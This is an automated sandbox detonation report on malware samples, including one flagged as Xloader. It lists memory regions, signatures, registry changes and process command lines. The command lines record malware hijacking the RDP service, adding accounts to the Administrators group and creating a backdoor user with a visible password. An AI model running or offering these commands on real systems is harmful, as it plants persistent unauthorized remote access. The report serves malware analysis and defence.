memory/3056-117-0x0000000005190000-0x0000000005191000-memory.dmp
memory/3056-118-0x00000000050F0000-0x0000000005182000-memory.dmp
memory/3056-119-0x0000000005170000-0x0000000005171000-memory.dmp
memory/3056-120-0x00000000054B0000-0x00000000054B1000-memory.dmp
memory/3056-121-0x0000000005770000-0x000000000578B000-memory.dmp
memory/3056-122-0x0000000008860000-0x00000000088D8000-memory.dmp
memory/3056-123-0x00000000088F0000-0x0000000008923000-memory.dmp
memory/1328-124-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmpF1F7.tmp
| MD5 | 45fa426b3bab2138ff2f5ad8c725fcb3 |
| SHA1 | acd36473912bb5e502369c40415e6a6d432bcd69 |
| SHA256 | 3e7b904f103e294745c8b1b06a7a5e152d084218707cdfac6d668b6161a028d5 |
| SHA512 | e3d547299c84c9952714d1b677a7d5fc57c7343a8c966b2a4346629c42435408f59bdbf54f328eea05c1e605711d82eb0221a2b4b19ff87b828cbdc9e741ba1a |
memory/2092-126-0x0000000000400000-0x000000000042E000-memory.dmp
memory/2092-127-0x000000000041EBD0-mapping.dmp
memory/2092-129-0x0000000001C10000-0x0000000001C24000-memory.dmp
memory/2092-128-0x00000000018A0000-0x0000000001BC0000-memory.dmp
memory/3064-130-0x0000000004DB0000-0x0000000004F53000-memory.dmp
memory/3064-132-0x00000000043C0000-0x00000000044C7000-memory.dmp
memory/2092-131-0x0000000001C60000-0x0000000001C74000-memory.dmp
memory/1040-133-0x0000000000000000-mapping.dmp
memory/1040-134-0x0000000001250000-0x0000000001270000-memory.dmp
memory/1040-135-0x00000000007C0000-0x00000000007EE000-memory.dmp
memory/3824-136-0x0000000000000000-mapping.dmp
memory/1040-137-0x0000000000E70000-0x0000000001190000-memory.dmp
memory/1040-138-0x0000000000CD0000-0x0000000000D63000-memory.dmp
memory/3064-139-0x00000000025C0000-0x0000000002687000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
56s
Max time network
118s
Command Line
Signatures
Xloader
Xloader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2896 set thread context of 3024 | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
Network
Files
memory/2896-114-0x0000000000B50000-0x0000000000B51000-memory.dmp
memory/2896-116-0x0000000005940000-0x0000000005941000-memory.dmp
memory/2896-117-0x00000000054E0000-0x00000000054E1000-memory.dmp
memory/2896-118-0x0000000005470000-0x0000000005471000-memory.dmp
memory/2896-119-0x00000000056F0000-0x00000000056F1000-memory.dmp
memory/2896-120-0x0000000005440000-0x000000000593E000-memory.dmp
memory/2896-121-0x0000000006F40000-0x0000000006F5B000-memory.dmp
memory/2896-122-0x0000000008B60000-0x0000000008BD3000-memory.dmp
memory/2896-123-0x0000000008BF0000-0x0000000008C1E000-memory.dmp
memory/3024-124-0x0000000000400000-0x0000000000428000-memory.dmp
memory/3024-125-0x000000000041D020-mapping.dmp
memory/3024-126-0x0000000001650000-0x0000000001970000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
53s
Max time network
116s
Command Line
Signatures
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies RDP port number used by Windows
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8199.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI81E8.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8218.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_olaj0bm5.1xs.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_bj2piuzv.0l4.psm1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8229.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI823A.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
"C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\likclxcl\likclxcl.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES403B.tmp" "c:\Users\Admin\AppData\Local\Temp\likclxcl\CSC481DC0B26B0F48F6857BB171B79C72BC.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc zr0Htc6U /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc zr0Htc6U /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc zr0Htc6U /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc zr0Htc6U
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc zr0Htc6U
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc zr0Htc6U
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
